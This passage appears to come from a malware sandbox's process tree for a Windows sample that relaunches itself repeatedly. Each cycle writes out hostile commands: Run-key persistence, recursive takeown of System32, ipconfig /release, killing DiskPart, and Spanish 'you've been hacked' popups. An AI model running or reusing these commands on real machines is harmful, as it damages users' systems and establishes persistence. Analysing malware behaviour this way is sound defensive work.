        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        33⤵
        
        PID:12808
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AD23.tmp\AD24.tmp\AD25.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        34⤵
        
        PID:8248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        35⤵
        
        PID:12776
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        36⤵
        
        PID:12768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        35⤵
        
        PID:464
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        35⤵
        
        PID:9168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        35⤵
        
        PID:9200
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        36⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12780
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        35⤵
        
        PID:8916
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        35⤵
        
        PID:8448
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        35⤵
        Gathers network information
        
        PID:8316
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        35⤵
        Kills process with taskkill
        
        PID:13108
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        35⤵
        Views/modifies file attributes
        
        PID:9136
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        35⤵
        
        PID:8920
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        35⤵
        
        PID:11216
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        35⤵
        
        PID:12980
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        35⤵
        
        PID:6524
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        35⤵
        
        PID:8728
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        35⤵
        
        PID:9020
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        35⤵
        
        PID:8276
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        35⤵
        
        PID:9048
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        35⤵
        
        PID:13336
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        35⤵
        
        PID:13396
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        35⤵
        
        PID:13408
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        35⤵
        
        PID:13456
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        35⤵
        
        PID:13480
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        35⤵
        
        PID:13496
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CB1A.tmp\CB1B.tmp\CB1C.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        36⤵
        
        PID:13652
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        37⤵
        
        PID:13980
        
        C:\Windows\system32\reg.exe
        
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
        38⤵
        
        PID:14092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        37⤵
        
        PID:14020
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        37⤵
        
        PID:14144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        37⤵
        
        PID:14176
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        38⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:14268
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        37⤵
        
        PID:14228
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        37⤵
        
        PID:14248
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        37⤵
        Gathers network information
        
        PID:14260
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        37⤵
        Kills process with taskkill
        
        PID:14300
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        37⤵
        Views/modifies file attributes
        
        PID:11272
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        37⤵
        
        PID:13464
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        37⤵
        
        PID:9388
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        37⤵
        
        PID:1540
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        37⤵
        
        PID:9556
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        37⤵
        
        PID:13592
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        37⤵
        
        PID:13756
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        37⤵
        
        PID:13636
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        37⤵
        
        PID:13720
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        37⤵
        
        PID:13804
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        37⤵
        
        PID:13828
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        37⤵
        
        PID:13896
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        37⤵
        
        PID:13912
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        37⤵
        
        PID:13924
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        37⤵
        
        PID:12264
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EBD1.tmp\EBD2.tmp\EBD3.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        38⤵
        
        PID:13768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        39⤵
        
        PID:13976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        39⤵
        
        PID:11744
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        39⤵
        
        PID:8040
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        39⤵
        
        PID:4656
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        40⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12156
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        39⤵
        
        PID:10368
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        39⤵
        
        PID:11932
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        39⤵
        Gathers network information
        
        PID:9412
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        39⤵
        Kills process with taskkill
        
        PID:11532
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        39⤵
        Views/modifies file attributes
        
        PID:5000
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        39⤵
        
        PID:14064
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        39⤵
        
        PID:11640
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        39⤵
        
        PID:10596
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        39⤵
        
        PID:10656
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        39⤵
        
        PID:2456
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        39⤵
        
        PID:10052
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        39⤵
        
        PID:14228
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        39⤵
        
        PID:11272
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        39⤵
        
        PID:10752
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        39⤵
        
        PID:2112
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        39⤵
        
        PID:10808
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        39⤵
        
        PID:12124
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        39⤵
        
        PID:12328
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        39⤵
        
        PID:7460
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\13AD.tmp\13AE.tmp\13AF.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        40⤵
        
        PID:14388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        41⤵
        
        PID:14788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        41⤵
        
        PID:14796
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        41⤵
        
        PID:14940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        41⤵
        
        PID:14948
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        42⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:15060
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        41⤵
        
        PID:14972
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        41⤵
        
        PID:15048
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        41⤵
        Gathers network information
        
        PID:15080
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        41⤵
        Kills process with taskkill
        
        PID:15108
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        41⤵
        Views/modifies file attributes
        
        PID:15136
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        41⤵
        
        PID:15244
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        41⤵
        
        PID:15268
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        41⤵
        
        PID:15292
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        41⤵
        
        PID:15316
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        41⤵
        
        PID:15348
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        41⤵
        
        PID:6840
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        41⤵
        
        PID:14408
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        41⤵
        
        PID:4956
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        41⤵
        
        PID:13152
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        41⤵
        
        PID:14504
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        41⤵
        
        PID:4672
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        41⤵
        
        PID:12068
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        41⤵
        
        PID:11128
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        41⤵
        
        PID:11080
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\34F0.tmp\34F1.tmp\34F2.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        42⤵
        
        PID:12732
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        43⤵
        
        PID:15160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        43⤵
        
        PID:13052
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        43⤵
        
        PID:14580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        43⤵
        
        PID:5404
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        44⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:14536
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        43⤵
        
        PID:2564
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        43⤵
        
        PID:5300
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        43⤵
        Gathers network information
        
        PID:14768
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        43⤵
        Kills process with taskkill
        
        PID:14820
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        43⤵
        Views/modifies file attributes
        
        PID:5592
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        43⤵
        
        PID:11284
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        43⤵
        
        PID:11320
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        43⤵
        
        PID:15132
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        43⤵
        
        PID:7236
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        43⤵
        
        PID:1908
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        43⤵
        
        PID:15140
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        43⤵
        
        PID:396
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        43⤵
        
        PID:11676
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        43⤵
        
        PID:7396
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        43⤵
        
        PID:6952
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        43⤵
        
        PID:7732
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        43⤵
        
        PID:752
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        43⤵
        
        PID:3948
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        43⤵
        
        PID:4028
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5951.tmp\5952.tmp\5953.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        44⤵
        
        PID:4292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        45⤵
        
        PID:15172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        45⤵
        
        PID:11984
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        45⤵
        
        PID:11660
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        45⤵
        
        PID:14660
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        46⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13740
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        45⤵
        
        PID:14652
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        45⤵
        
        PID:11780
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        45⤵
        Gathers network information
        
        PID:11636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        45⤵
        Kills process with taskkill
        
        PID:8984
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        45⤵
        Views/modifies file attributes
        
        PID:4516
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        45⤵
        
        PID:6912
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        45⤵
        
        PID:5140
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        45⤵
        
        PID:5652
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        45⤵
        
        PID:7732
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        45⤵
        
        PID:2832
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        45⤵
        
        PID:14500
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        45⤵
        
        PID:7844
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        45⤵
        
        PID:8496
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        45⤵
        
        PID:6160
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        45⤵
        
        PID:14648
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        45⤵
        
        PID:4916
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        45⤵
        
        PID:13120
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        45⤵
        
        PID:6680
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        45⤵
        
        PID:5380
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\813B.tmp\813C.tmp\813D.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        46⤵
        
        PID:11780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        47⤵
        
        PID:12484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        47⤵
        
        PID:10368
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        47⤵
        
        PID:5460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        47⤵
        
        PID:12988
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        48⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:13036
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        47⤵
        
        PID:9860
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        47⤵
        
        PID:10340
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        47⤵
        Gathers network information
        
        PID:9880
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        47⤵
        Kills process with taskkill
        
        PID:8596
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        47⤵
        Views/modifies file attributes
        
        PID:7500
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        47⤵
        
        PID:1856
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        47⤵
        
        PID:10184
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        47⤵
        
        PID:7812
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        47⤵
        
        PID:2004
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        47⤵
        
        PID:1964
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        47⤵
        
        PID:12628
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        47⤵
        
        PID:6928
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        47⤵
        
        PID:7120
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        47⤵
        
        PID:12268
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Advertencia.vbs"
        47⤵
        
        PID:5640
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        47⤵
        
        PID:12760
        
        C:\Windows\system32\msg.exe
        
        msg * Virus Detectado
        47⤵
        
        PID:14908
        
        C:\Windows\system32\msg.exe
        
        msg * Has Sido Hackeado!
        47⤵
        
        PID:9884
        
        C:\Users\Admin\Desktop\ADZP 20 Complex.exe
        
        "C:\Users\Admin\Desktop\ADZP 20 Complex.exe"
        47⤵
        
        PID:15040
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9DAD.tmp\9DAE.tmp\9DAF.bat "C:\Users\Admin\Desktop\ADZP 20 Complex.exe""
        48⤵
        
        PID:9452
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        49⤵
        
        PID:15500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Twain_20.cmd
        49⤵
        
        PID:15528
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\Informacion.vbs"
        49⤵
        
        PID:15680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        49⤵
        
        PID:15688
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        50⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:15832
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
        49⤵
        
        PID:15716
        
        C:\Windows\system32\reg.exe
        
        reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
        49⤵
        
        PID:15796
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        49⤵
        Gathers network information
        
        PID:15808
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /im DiskPart /f
        49⤵
        Kills process with taskkill
        
        PID:15856
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        49⤵
        Views/modifies file attributes
        
        PID:15948
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\ErrorCritico.vbs"
        49⤵
        
        PID:16008
        
        C:\Windows\System32\WScript.exe
        
